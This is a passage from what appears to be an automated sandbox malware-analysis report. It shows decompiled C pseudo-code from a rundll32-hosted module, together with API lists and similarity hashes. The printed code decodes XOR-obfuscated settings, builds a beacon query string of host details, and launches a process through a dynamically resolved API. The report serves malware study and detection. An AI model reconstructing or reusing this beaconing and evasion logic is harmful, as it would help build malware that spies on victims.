                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x4a4d244 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0x4a4d2a4; // 0x69b25f44
                                						_t47 = E04A49403(_t104, _t103, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x4a4d248 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0x4a4d2a4; // 0x69b25f44
                                						_t48 = E04A49403(_t104, _t103, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0x4a4d004 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0x4a4d2a4; // 0x69b25f44
                                						_t49 = E04A49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0x4a4d02c = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0x4a4d2a4; // 0x69b25f44
                                						_t50 = E04A49403(_t104, _t103, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0x4a4d24c = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t103 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0x4a4d2a4; // 0x69b25f44
                                								_t51 = E04A49403(_t104, _t103, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E04A4A0FD(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E04A49FF6();
                                								}
                                							}
                                							if(_t103 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0x4a4d2a4; // 0x69b25f44
                                								_t52 = E04A49403(_t104, _t103, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E04A4A0FD(0, _t52) != 0) {
                                								_t121 =  *0x4a4d32c; // 0x4e595b0
                                								E04A41128(_t121 + 4, _t68);
                                							}
                                							if(_t103 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0x4a4d2a4; // 0x69b25f44
                                								_t53 = E04A49403(_t104, _t103, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0x4a4d2a8; // 0x40a5a8
                                								_t22 = _t54 + 0x4a4e252; // 0x616d692f
                                								 *0x4a4d2d4 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E04A4A0FD(0, _t53);
                                								 *0x4a4d2d4 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t103 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0x4a4d2a4; // 0x69b25f44
                                										_t56 = E04A49403(_t104, _t103, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0x4a4d2a8; // 0x40a5a8
                                										_t23 = _t57 + 0x4a4e791; // 0x6976612e
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E04A4A0FD(0, _t56);
                                									}
                                									 *0x4a4d340 = _t58;
                                									HeapFree( *0x4a4d238, 0, _t103);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A48063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A48095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A480C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A480F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A4812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008), ref: 04A4815D
                                • HeapFree.KERNEL32(00000000,04A430F3,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008,?,04A430F3), ref: 04A4825B
                                • HeapFree.KERNEL32(00000000,?,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005,04A4D00C,00000008,?,04A430F3), ref: 04A4826E
                                  • Part of subcall function 04A4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,04A430F3,04A48241,00000000,04A430F3,?,69B25F44,?,04A430F3,69B25F44,?,04A430F3,69B25F44,00000005), ref: 04A4A106
                                  • Part of subcall function 04A4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,04A430F3), ref: 04A4A129
                                  • Part of subcall function 04A4A0FD: memset.NTDLL ref: 04A4A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: e67bb2e2c17af6fc11ffd74aaffac1029c07d07d56e6ba94617f4e5ebb9b3389
                                • Instruction ID: c582b800c4a21ec88a8cb3624fcd0e42f953ca04879ad7c373f1fb89fea136a1
                                • Opcode Fuzzy Hash: e67bb2e2c17af6fc11ffd74aaffac1029c07d07d56e6ba94617f4e5ebb9b3389
                                • Instruction Fuzzy Hash: 0581427CA11605AFEB11FBB8ED84D5F76BDEBD8700724091AE405DB604EA7EF9428720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E04A45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                				void* _v8;
                                				signed int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				void* __ebx;
                                				void* __edi;
                                				long _t59;
                                				intOrPtr _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t62;
                                				intOrPtr _t63;
                                				intOrPtr _t64;
                                				void* _t67;
                                				intOrPtr _t68;
                                				int _t71;
                                				void* _t72;
                                				void* _t73;
                                				void* _t75;
                                				void* _t78;
                                				intOrPtr _t82;
                                				intOrPtr _t86;
                                				intOrPtr* _t88;
                                				void* _t94;
                                				intOrPtr _t100;
                                				signed int _t104;
                                				char** _t106;
                                				int _t109;
                                				intOrPtr* _t112;
                                				intOrPtr* _t114;
                                				intOrPtr* _t116;
                                				intOrPtr* _t118;
                                				intOrPtr _t121;
                                				intOrPtr _t126;
                                				int _t130;
                                				CHAR* _t132;
                                				intOrPtr _t133;
                                				void* _t134;
                                				void* _t143;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t146;
                                				void* _t148;
                                				long _t152;
                                				intOrPtr* _t153;
                                				intOrPtr* _t154;
                                				intOrPtr* _t157;
                                				void* _t158;
                                				void* _t160;
                                
                                				_t143 = __edx;
                                				_t134 = __ecx;
                                				_t59 = __eax;
                                				_v12 = 8;
                                				if(__eax == 0) {
                                					_t59 = GetTickCount();
                                				}
                                				_t60 =  *0x4a4d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t61 =  *0x4a4d014; // 0x3a87c8cd
                                				_t132 = _a16;
                                				asm("bswap eax");
                                				_t62 =  *0x4a4d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t63 = E04A4D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t64 =  *0x4a4d2a8; // 0x40a5a8
                                				_t3 = _t64 + 0x4a4e633; // 0x74666f73
                                				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x4a4d02c,  *0x4a4d004, _t59);
                                				_t67 = E04A43288();
                                				_t68 =  *0x4a4d2a8; // 0x40a5a8
                                				_t4 = _t68 + 0x4a4e673; // 0x74707526
                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                				_t160 = _t158 + 0x38;
                                				_t145 = _t144 + _t71;
                                				_t72 = E04A4831C(_t134);
                                				_t133 = __imp__; // 0x74e05520
                                				_v8 = _t72;
                                				if(_t72 != 0) {
                                					_t126 =  *0x4a4d2a8; // 0x40a5a8
                                					_t7 = _t126 + 0x4a4e8d4; // 0x736e6426
                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                					_t160 = _t160 + 0xc;
                                					_t145 = _t145 + _t130;
                                					HeapFree( *0x4a4d238, 0, _v8);
                                				}
                                				_t73 = E04A49267();
                                				_v8 = _t73;
                                				if(_t73 != 0) {
                                					_t121 =  *0x4a4d2a8; // 0x40a5a8
                                					_t11 = _t121 + 0x4a4e8dc; // 0x6f687726
                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                					_t160 = _t160 + 0xc;
                                					HeapFree( *0x4a4d238, 0, _v8);
                                				}
                                				_t146 =  *0x4a4d32c; // 0x4e595b0
                                				_t75 = E04A4284E(0x4a4d00a, _t146 + 4);
                                				_t152 = 0;
                                				_v20 = _t75;
                                				if(_t75 == 0) {
                                					L26:
                                					HeapFree( *0x4a4d238, _t152, _a16);
                                					return _v12;
                                				} else {
                                					_t78 = RtlAllocateHeap( *0x4a4d238, 0, 0x800);
                                					_v8 = _t78;
                                					if(_t78 == 0) {
                                						L25:
                                						HeapFree( *0x4a4d238, _t152, _v20);
                                						goto L26;
                                					}
                                					E04A43239(GetTickCount());
                                					_t82 =  *0x4a4d32c; // 0x4e595b0
                                					__imp__(_t82 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t86 =  *0x4a4d32c; // 0x4e595b0
                                					__imp__(_t86 + 0x40);
                                					_t88 =  *0x4a4d32c; // 0x4e595b0
                                					_t148 = E04A47B8D(1, _t143, _a16,  *_t88);
                                					_v28 = _t148;
                                					asm("lock xadd [eax], ecx");
                                					if(_t148 == 0) {
                                						L24:
                                						HeapFree( *0x4a4d238, _t152, _v8);
                                						goto L25;
                                					}
                                					StrTrimA(_t148, 0x4a4c28c);
                                					_push(_t148);
                                					_t94 = E04A4A677();
                                					_v16 = _t94;
                                					if(_t94 == 0) {
                                						L23:
                                						HeapFree( *0x4a4d238, _t152, _t148);
                                						goto L24;
                                					}
                                					_t153 = __imp__;
                                					 *_t153(_t148, _a4);
                                					 *_t153(_v8, _v20);
                                					_t154 = __imp__;
                                					 *_t154(_v8, _v16);
                                					_t100 = E04A47B3B( *_t154(_v8, _t148), _v8);
                                					_a4 = _t100;
                                					if(_t100 == 0) {
                                						_v12 = 8;
                                						L21:
                                						E04A45433();
                                						L22:
                                						HeapFree( *0x4a4d238, 0, _v16);
                                						_t152 = 0;
                                						goto L23;
                                					}
                                					_t104 = E04A49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                					_v12 = _t104;
                                					if(_t104 == 0) {
                                						_t157 = _v24;
                                						_v12 = E04A4137B(_t157, _a4, _a8, _a12);
                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                						_t118 =  *_t157;
                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                						E04A48B22(_t157);
                                					}
                                					if(_v12 != 0x10d2) {
                                						L16:
                                						if(_v12 == 0) {
                                							_t106 = _a8;
                                							if(_t106 != 0) {
                                								_t149 =  *_t106;
                                								_t155 =  *_a12;
                                								wcstombs( *_t106,  *_t106,  *_a12);
                                								_t109 = E04A47953(_t149, _t149, _t155 >> 1);
                                								_t148 = _v28;
                                								 *_a12 = _t109;
                                							}
                                						}
                                						goto L19;
                                					} else {
                                						if(_a8 != 0) {
                                							L19:
                                							E04A48B22(_a4);
                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                								goto L22;
                                							} else {
                                								goto L21;
                                							}
                                						}
                                						_v12 = _v12 & 0x00000000;
                                						goto L16;
                                					}
                                				}
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A45464
                                • wsprintfA.USER32 ref: 04A454B4
                                • wsprintfA.USER32 ref: 04A454D1
                                • wsprintfA.USER32 ref: 04A454FD
                                • HeapFree.KERNEL32(00000000,?), ref: 04A4550F
                                • wsprintfA.USER32 ref: 04A45530
                                • HeapFree.KERNEL32(00000000,?), ref: 04A45540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A4556E
                                • GetTickCount.KERNEL32 ref: 04A4557F
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A45593
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A455B1
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A47B8D: strcpy.NTDLL ref: 04A47BD7
                                  • Part of subcall function 04A47B8D: lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                • StrTrimA.SHLWAPI(00000000,04A4C28C,?,04E595B0), ref: 04A455E8
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A4A677: lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                  • Part of subcall function 04A4A677: lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04A45609
                                • lstrcpy.KERNEL32(?,?), ref: 04A45611
                                • lstrcat.KERNEL32(?,?), ref: 04A4561F
                                • lstrcat.KERNEL32(?,00000000), ref: 04A45625
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                • wcstombs.NTDLL ref: 04A456B6
                                  • Part of subcall function 04A4137B: SysAllocString.OLEAUT32(?), ref: 04A413B6
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 04A456F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A45703
                                • HeapFree.KERNEL32(00000000,?,?,04E595B0), ref: 04A4570F
                                • HeapFree.KERNEL32(00000000,?), ref: 04A4571B
                                • HeapFree.KERNEL32(00000000,?), ref: 04A45727
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: 1409ead304acba2398456c21d81c4abd6478207790165ebdbdfca63e2a2ea49c
                                • Instruction ID: d8513f3bf78e686a3e63b0ac8db5ee28d18803af78fe1502ea0ae68f49b1eaba
                                • Opcode Fuzzy Hash: 1409ead304acba2398456c21d81c4abd6478207790165ebdbdfca63e2a2ea49c
                                • Instruction Fuzzy Hash: 68914979900108BFEB119FA4DC88AAEBBB9EFD8354F144454F509DB220D73AED52DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E04A43485(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E04A44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E04A4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0x4a4d260 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0x4a4d2a8; // 0x40a5a8
                                					_t18 = _t47 + 0x4a4e3e6; // 0x73797325
                                					_t68 = E04A47912(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0x4a4d2a8; // 0x40a5a8
                                						_t19 = _t50 + 0x4a4e747; // 0x4e58cef
                                						_t20 = _t50 + 0x4a4e0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E04A43179();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                							_push(1);
                                							E04A43179();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x4a4d238, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E04A48B22(_t70);
                                				goto L12;
                                			}
                                0x04a4348d
                                0x04a4348d
                                0x04a4349c
                                0x04a434a3
                                0x04a434a8
                                0x04a435b5
                                0x04a435bc
                                0x04a435bc
                                0x04a434b7
                                0x04a434bf
                                0x04a434c2
                                0x04a434c7
                                0x04a434dc
                                0x04a434e2
                                0x04a434e3
                                0x04a434e6
                                0x04a434ec
                                0x04a434ef
                                0x04a434f4
                                0x04a434fc
                                0x04a43508
                                0x04a4350c
                                0x04a4359c
                                0x04a43512
                                0x04a43512
                                0x04a43517
                                0x04a4351e
                                0x04a43532
                                0x04a43536
                                0x04a43585
                                0x04a43538
                                0x04a43539
                                0x04a43540
                                0x04a43559
                                0x04a4355b
                                0x04a4355f
                                0x04a43566
                                0x04a43580
                                0x04a43568
                                0x04a43571
                                0x04a43576
                                0x04a43576
                                0x04a43566
                                0x04a43594
                                0x04a43594
                                0x04a4350c
                                0x04a435a3
                                0x04a435ac
                                0x04a435b0
                                0x00000000

                                APIs
                                  • Part of subcall function 04A44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A434A1,?,00000001,?,?,00000000,00000000), ref: 04A44969
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A4498B
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A449A1
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A449B7
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A449CD
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A449E3
                                • memset.NTDLL ref: 04A434EF
                                  • Part of subcall function 04A47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04A43508,73797325), ref: 04A47923
                                  • Part of subcall function 04A47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04A4793D
                                • GetModuleHandleA.KERNEL32(4E52454B,04E58CEF,73797325), ref: 04A43525
                                • GetProcAddress.KERNEL32(00000000), ref: 04A4352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A43594
                                  • Part of subcall function 04A43179: GetProcAddress.KERNEL32(36776F57,04A48BDC), ref: 04A43194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 04A43571
                                • CloseHandle.KERNEL32(?), ref: 04A43576
                                • GetLastError.KERNEL32(00000001), ref: 04A4357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 3a418f365c7bc776c03a93a9c9be3752936bc212887471d47805e9d3555103c3
                                • Instruction ID: ae08512aa68381fc2b7925674ba55b915a7375660bb80c23bbebd817435a579a
                                • Opcode Fuzzy Hash: 3a418f365c7bc776c03a93a9c9be3752936bc212887471d47805e9d3555103c3
                                • Instruction Fuzzy Hash: 773150B6900208AFEF10AFA4D988D9EBBBCEFC8314F004569E906E7110D775AE49DB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E04A48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x4a4d33c; // 0x4e59bc0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E04A49B1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x4a4c18c;
                                				}
                                				_t46 = E04A47F8B(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E04A41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x4a4d2a8; // 0x40a5a8
                                						_t16 = _t75 + 0x4a4eb08; // 0x530025
                                						 *0x4a4d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E04A49B1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x4a4c190;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E04A41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E04A48B22(_v20);
                                						} else {
                                							_t66 =  *0x4a4d2a8; // 0x40a5a8
                                							_t31 = _t66 + 0x4a4ec28; // 0x73006d
                                							 *0x4a4d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E04A48B22(_v12);
                                				}
                                				return _v24;
                                			}
                                0x04a48f8d
                                0x04a48f93
                                0x04a48f9a
                                0x04a48fa0
                                0x04a48fa4
                                0x04a48fa8
                                0x04a48fab
                                0x04a48fb0
                                0x04a48fb5
                                0x04a48fb7
                                0x04a48fb7
                                0x04a48fc0
                                0x04a48fc5
                                0x04a48fca
                                0x04a48fd0
                                0x04a48fda
                                0x04a48fe3
                                0x04a48fea
                                0x04a49003
                                0x04a49008
                                0x04a4900d
                                0x04a49016
                                0x04a4901f
                                0x04a49030
                                0x04a49039
                                0x04a4903d
                                0x04a49041
                                0x04a49046
                                0x04a4904b
                                0x04a4904d
                                0x04a4904d
                                0x04a49057
                                0x04a49060
                                0x04a49067
                                0x04a4907f
                                0x04a49083
                                0x04a490c0
                                0x04a49085
                                0x04a49088
                                0x04a49090
                                0x04a490a1
                                0x04a490ad
                                0x04a490b5
                                0x04a490b9
                                0x04a490b9
                                0x04a49083
                                0x04a490c8
                                0x04a490cd
                                0x04a490d4

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A48F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 04A48FDA
                                • lstrlen.KERNEL32(00000000), ref: 04A48FE3
                                • lstrlen.KERNEL32(00000000), ref: 04A48FEA
                                • lstrlenW.KERNEL32(80000002), ref: 04A48FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 04A49057
                                • lstrlen.KERNEL32(?), ref: 04A49060
                                • lstrlen.KERNEL32(?), ref: 04A49067
                                • lstrlenW.KERNEL32(?), ref: 04A4906E
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: e210c9373d6e5af231fde9bb86a0cab66a7a32232b663ed8117d1b504670107b
                                • Instruction ID: 5331b94083c7922d1c761871780b00948e1cb6912485f0d066c881cc5af0a358
                                • Opcode Fuzzy Hash: e210c9373d6e5af231fde9bb86a0cab66a7a32232b663ed8117d1b504670107b
                                • Instruction Fuzzy Hash: 6A414A76900219FFDF11AFA4DD489DEBBB9EFC8354F054054E904A7210DB3AEA61DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A457DD(void* __ecx, void* __esi) {
                                				long _v8;
                                				long _v12;
                                				long _v16;
                                				long _v20;
                                				long _t34;
                                				long _t39;
                                				long _t42;
